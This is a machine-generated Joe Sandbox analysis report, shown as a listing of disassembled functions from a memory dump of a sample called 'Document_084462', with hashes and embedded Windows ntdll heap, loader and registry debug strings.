                                                                              • Instruction ID: 0b2d1014d58f51481d13538e98c90bcca847fc2c876d6a83d5b48a9cb60f28ec
                                                                              • Opcode Fuzzy Hash: 79f595932eff051bfbc6f73fa77d46973d92abc92329236736d6fc7be9ad977b
                                                                              • Instruction Fuzzy Hash: 7E2127B5A42A18DBF7018B58DD41B9AB3F9EF45754F084079E815E7341EB38DD42CB41
                                                                              Function 37AB7072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 46043b3cd8d9d63da97a0f2623bde167780a18cab94e0fcbdae95b785e404d6c
                                                                              • Instruction ID: 9248f93f50b257be806597b9252acae4366ee7508829d0c451faae5f76fbb12c
                                                                              • Opcode Fuzzy Hash: 46043b3cd8d9d63da97a0f2623bde167780a18cab94e0fcbdae95b785e404d6c
                                                                              • Instruction Fuzzy Hash: 9051F174A00619EFEB15DB68CD5476DB7B8FF44322F10416BE82297390DBB89901CB91
                                                                              Function 37AC1EB2 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: c7b4c60e25bc26dda7aa458b4197d2c50fb457137f5984447a9c2ec1ee8573af
                                                                              • Instruction ID: 6c6d02a3f08ba0a99daad4085b57b6fc00833c5a6aa3a95057a473e8b15193d2
                                                                              • Opcode Fuzzy Hash: c7b4c60e25bc26dda7aa458b4197d2c50fb457137f5984447a9c2ec1ee8573af
                                                                              • Instruction Fuzzy Hash: 8322DDB4600656AFE705CF24C480B7ABBF5FF45714F14849AE865CB381EB35E981CBA1
                                                                              Function 37B43608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                              • API String ID: 0-1168191160
                                                                              • Opcode ID: c2c3583168483b0c42180fc7519026fa63b09b1d80c87fd59788c66fe29c3702
                                                                              • Instruction ID: fdf5ac18b8b65d7f477c3e0a797d3f31293b56b5ff3985afb91f298ae8e4cd87
                                                                              • Opcode Fuzzy Hash: c2c3583168483b0c42180fc7519026fa63b09b1d80c87fd59788c66fe29c3702
                                                                              • Instruction Fuzzy Hash: C6F172F5A002298BEB20CB18CC90B99B3B5EF48754F8840D9E549B7241E7359E85DF65
                                                                              Function 37AB1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 37AB1648
                                                                              • HEAP: , xrefs: 37AB14B6
                                                                              • HEAP[%wZ]: , xrefs: 37AB1632
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: 31d923e6d4df11ac597c7256c555d09743991504c57b3abb76d1af72a9a665a0
                                                                              • Instruction ID: d99c54dd1d0507102a7ce9363d64ec4464c32368cf193ee2d1f1f734936b99dd
                                                                              • Opcode Fuzzy Hash: 31d923e6d4df11ac597c7256c555d09743991504c57b3abb76d1af72a9a665a0
                                                                              • Instruction Fuzzy Hash: 56E1E3B4A047459FEB24CF28C891B7ABBF9EF88310F14855DE8A6CB245E734E945CB50
                                                                              Function 37ADF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 37B20128
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 37B200C7
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 37B200F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 1d369c14614fbcf8352154a45b8efab9f71b8eac495d867a7127c0649b25b9d9
                                                                              • Instruction ID: 0c1e49beaa114dd041cd0549fa4c710a6a535f2d5b27e31ea36a1c6acc6d4ace
                                                                              • Opcode Fuzzy Hash: 1d369c14614fbcf8352154a45b8efab9f71b8eac495d867a7127c0649b25b9d9
                                                                              • Instruction Fuzzy Hash: 95E18AB4609741DFE711CF28C8A0B5AB7F0BB84364F100A59F9B58B2E1DB79E945CB42
                                                                              Function 37ABB5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                              • API String ID: 0-1145731471
                                                                              • Opcode ID: 0c65d18ad575110df90325139ceb2d1ce904402f4da7063f463db545e5936b72
                                                                              • Instruction ID: ca2f5e799e3145c3e1e05e1ab7db9ea443988785be7cd798905ca038b1f92af4
                                                                              • Opcode Fuzzy Hash: 0c65d18ad575110df90325139ceb2d1ce904402f4da7063f463db545e5936b72
                                                                              • Instruction Fuzzy Hash: 3CB1AD75A057159FEB24CF68C9A0B9DB7F9AF98764F114429E821EB790E730E840CF21
                                                                              Function 37B3330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                              • API String ID: 0-2391371766
                                                                              • Opcode ID: 2917cd5a6b968ad1b2516e8cc2e5edd6c6640ba0d315e01492f566c8e2903ca3
                                                                              • Instruction ID: 83f4fff39e51825ebc83bcffdda246f7efec9ce5e972f03940d87e61d5dd825a
                                                                              • Opcode Fuzzy Hash: 2917cd5a6b968ad1b2516e8cc2e5edd6c6640ba0d315e01492f566c8e2903ca3
                                                                              • Instruction Fuzzy Hash: EEB1B1B160A301AFF311DF50CC81B5B77F8EB48754F054829FA60DB280D779E8888BA2
                                                                              Function 37B536E0 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                              • API String ID: 0-1146358195
                                                                              • Opcode ID: 196c9ddd77cfe4d270a86e03b33c5ec62800682c102d1bc8e2f70dee2d1d454c
                                                                              • Instruction ID: 8620f6b86f6800f2152b13ced94dfac217734d8efc170c3f420a83797d080ea3
                                                                              • Opcode Fuzzy Hash: 196c9ddd77cfe4d270a86e03b33c5ec62800682c102d1bc8e2f70dee2d1d454c
                                                                              • Instruction Fuzzy Hash: 23A16AB15093119BE711DF24C980B5BBBF8EF88768F41092DF995A7250D735ED08CBA2
                                                                              Function 37B4327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                              • API String ID: 0-318774311
                                                                              • Opcode ID: 51ee926a0529978689e99f0a6c9e98058c7acfcb6861da0ed34e6912c5b95295
                                                                              • Instruction ID: 9470f205eb74259f8a292e35dad357525a9cd8a1462fa2aa05b7e74691743915
                                                                              • Opcode Fuzzy Hash: 51ee926a0529978689e99f0a6c9e98058c7acfcb6861da0ed34e6912c5b95295
                                                                              • Instruction Fuzzy Hash: 4E8180B5608351AFE711CB14C940B6AB7F8EF88750F84092DFD50A7290DB74ED04DB62
                                                                              Function 37B37090 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                              • API String ID: 0-3870751728
                                                                              • Opcode ID: 9808df985d24b7d1f6780142b7adff08aede59a37b58de41d767f9cd7a800a15
                                                                              • Instruction ID: 9f3920f12b3b3db0a22df5079729ecb88de144d315c73f581f4b807d194608fc
                                                                              • Opcode Fuzzy Hash: 9808df985d24b7d1f6780142b7adff08aede59a37b58de41d767f9cd7a800a15
                                                                              • Instruction Fuzzy Hash: 18912AB4E016159BFB14CFA9C880B9DB7F1FF48314F14816AE914AB391E7799882CF51
                                                                              Function 37ABB360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                              • API String ID: 0-373624363
                                                                              • Opcode ID: 3edb784e7da00b08e22f60a2ced7d0fbfc1b75d7909acc99d5993f9ba53601f4
                                                                              • Instruction ID: 93cc2237fa128ba0e3fa294322fde825b4bf5d55a8b0658be45cb603807a0e08
                                                                              • Opcode Fuzzy Hash: 3edb784e7da00b08e22f60a2ced7d0fbfc1b75d7909acc99d5993f9ba53601f4
                                                                              • Instruction Fuzzy Hash: 8791ABB5904355CBEF21CF54C8907ADB7B4EF44764F544295EC21AB290E778AE80CFA1
                                                                              Function 37B8B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 37B8B3AA
                                                                              • GlobalizationUserSettings, xrefs: 37B8B3B4
                                                                              • TargetNtPath, xrefs: 37B8B3AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                              • API String ID: 0-505981995
                                                                              • Opcode ID: b40cd0b035ef0f0c250218c5dd40b9ddf0c6d53ecfd14325402b9f1a32722b6e
                                                                              • Instruction ID: 12765dc18720d3764c271b549b2c57f22bc1f7da02eec3d3117eb5af9161464d
                                                                              • Opcode Fuzzy Hash: b40cd0b035ef0f0c250218c5dd40b9ddf0c6d53ecfd14325402b9f1a32722b6e
                                                                              • Instruction Fuzzy Hash: DD619172D41269ABEB21DF64DC98BDAB7B8EB04710F4101E9E918A7250CB34DE84CF91
                                                                              Function 37AAF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • HEAP: , xrefs: 37B0E442
                                                                              • HEAP[%wZ]: , xrefs: 37B0E435
                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 37B0E455
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                              • API String ID: 0-1340214556
                                                                              • Opcode ID: 52b18e0bb72eadbee1e12b83bfd9c7090320612fd907937cf5bc35cf9864cbd8
                                                                              • Instruction ID: 4b44b14b85574bb15c4b3d76f443d125562d83d1609ab75c8ad92e652473c85d
                                                                              • Opcode Fuzzy Hash: 52b18e0bb72eadbee1e12b83bfd9c7090320612fd907937cf5bc35cf9864cbd8
                                                                              • Instruction Fuzzy Hash: B051F175604784EFF706CBA4C984FAABFF8EF08754F0440A5E9609B292D738E904CB51
                                                                              Function 37AD1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 37B1A3A7
                                                                              • LdrpCompleteMapModule, xrefs: 37B1A39D
                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 37B1A396
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                              • API String ID: 0-1676968949
                                                                              • Opcode ID: 6e7d9379f65fca41a4b1360f88fb2d5424583161d4e30e70b4ce289a19278e97
                                                                              • Instruction ID: dcc5c7282ff5fc218cf379e80e57500b1135be104fd3cff6786046edce20ccdc
                                                                              • Opcode Fuzzy Hash: 6e7d9379f65fca41a4b1360f88fb2d5424583161d4e30e70b4ce289a19278e97
                                                                              • Instruction Fuzzy Hash: 2F510278A04745EBF711CB6CDA94B6AB7F4EB44764F1101A4EC629B6D1DB38F900CB41
                                                                              Function 37B5D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 37B5D7B2
                                                                              • HEAP: , xrefs: 37B5D79F
                                                                              • HEAP[%wZ]: , xrefs: 37B5D792
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                              • API String ID: 0-3815128232
                                                                              • Opcode ID: 28f669886ca5c708569e5e7c07938d158c9f7a637d8089c8c83e10df483c7a73
                                                                              • Instruction ID: ea76e987a750fc1f111622d81b7fc465119cb70705a3166a3142f16b44a155d3
                                                                              • Opcode Fuzzy Hash: 28f669886ca5c708569e5e7c07938d158c9f7a637d8089c8c83e10df483c7a73
                                                                              • Instruction Fuzzy Hash: 595104B91007608AF350DB29C4C077277F1EB452F5F904A89E4D5EB181E639E847DB21
                                                                              Function 37AA753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                              • API String ID: 0-1151232445
                                                                              • Opcode ID: 9414b762a783582f381db0ccd33d3bb4f2bbdfa6d055ee478792dcc7e8c6f976
                                                                              • Instruction ID: a91acfc8fcf155b3641a83a9df7e33645ef8df4bfcdaee1dcef2e9ef3c06d6ab
                                                                              • Opcode Fuzzy Hash: 9414b762a783582f381db0ccd33d3bb4f2bbdfa6d055ee478792dcc7e8c6f976
                                                                              • Instruction Fuzzy Hash: 8441F3B8640350DFFB95CA18C4D0B667FA0DB01266F6449ADDC558B662CB24E84ACF62
                                                                              Function 37AE15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 37B21954
                                                                              • LdrpAllocateTls, xrefs: 37B2194A
                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37B21943
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-4274184382
                                                                              • Opcode ID: 8fffae2eab0dd2c583f6d218c2ce592dcf15b0893ec86cfeb0af9fea89ed9bae
                                                                              • Instruction ID: f98afcc8c64f60855d424ac1feb10bf5257d71b3affffe78d4f2d00149a8c4b1
                                                                              • Opcode Fuzzy Hash: 8fffae2eab0dd2c583f6d218c2ce592dcf15b0893ec86cfeb0af9fea89ed9bae
                                                                              • Instruction Fuzzy Hash: C3418DB5A01219AFDB15CFA8C991BADFBF5FF48310F048129E815A7650DB39A901CF91
                                                                              Function 37AE32C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RtlCreateActivationContext, xrefs: 37B22803
                                                                              • SXS: %s() passed the empty activation context data, xrefs: 37B22808
                                                                              • Actx , xrefs: 37AE32CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                              • API String ID: 0-859632880
                                                                              • Opcode ID: 66fc8ba56afaef7cceccada14096416e59b4e42e158a611cb1a293dd8f84fe43
                                                                              • Instruction ID: a8cb360bd6f2d28d46faca1548c9b037723c1103cf7254f29fb384747aa3456e
                                                                              • Opcode Fuzzy Hash: 66fc8ba56afaef7cceccada14096416e59b4e42e158a611cb1a293dd8f84fe43
                                                                              • Instruction Fuzzy Hash: 7F31E27260120AAFEB05CE58D890F9A37A8EF48720F51446AFC24DF281DB75ED45CB91
                                                                              Function 37B3B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • @, xrefs: 37B3B2F0
                                                                              • GlobalFlag, xrefs: 37B3B30F
                                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 37B3B2B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                              • API String ID: 0-4192008846
                                                                              • Opcode ID: 9d984a03d481fc0b584a8c1dd48f0195bc5ef2062227aabbe946f5e7d26b603d
                                                                              • Instruction ID: 85d9600f1521915f0cbf0f6b105f181db5df449ae343836ccd9252038c0e71fa
                                                                              • Opcode Fuzzy Hash: 9d984a03d481fc0b584a8c1dd48f0195bc5ef2062227aabbe946f5e7d26b603d
                                                                              • Instruction Fuzzy Hash: B2315CB1901219AEEB10EF94DD81AEFBBBCEF04744F400469EA11A7144D739AE448B91
                                                                              Function 37AE1527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 37B2185B
                                                                              • LdrpInitializeTls, xrefs: 37B21851
                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 37B2184A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-931879808
                                                                              • Opcode ID: 974f252c5f6d1c781bf7b9a8f990acc3ba343a2870930e26ff2323cbc26b4519
                                                                              • Instruction ID: 59bbc85b3384fb428461ea6620346fa12987ced8045e5e2e2df83dff85cf707e
                                                                              • Opcode Fuzzy Hash: 974f252c5f6d1c781bf7b9a8f990acc3ba343a2870930e26ff2323cbc26b4519
                                                                              • Instruction Fuzzy Hash: 4C31E471A41214FBF7109B98CD86FAEB7BCEF44354F010029E826B7580EB78AE4187B1
                                                                              Function 37AF1190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • BuildLabEx, xrefs: 37AF122F
                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 37AF119B
                                                                              • @, xrefs: 37AF11C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
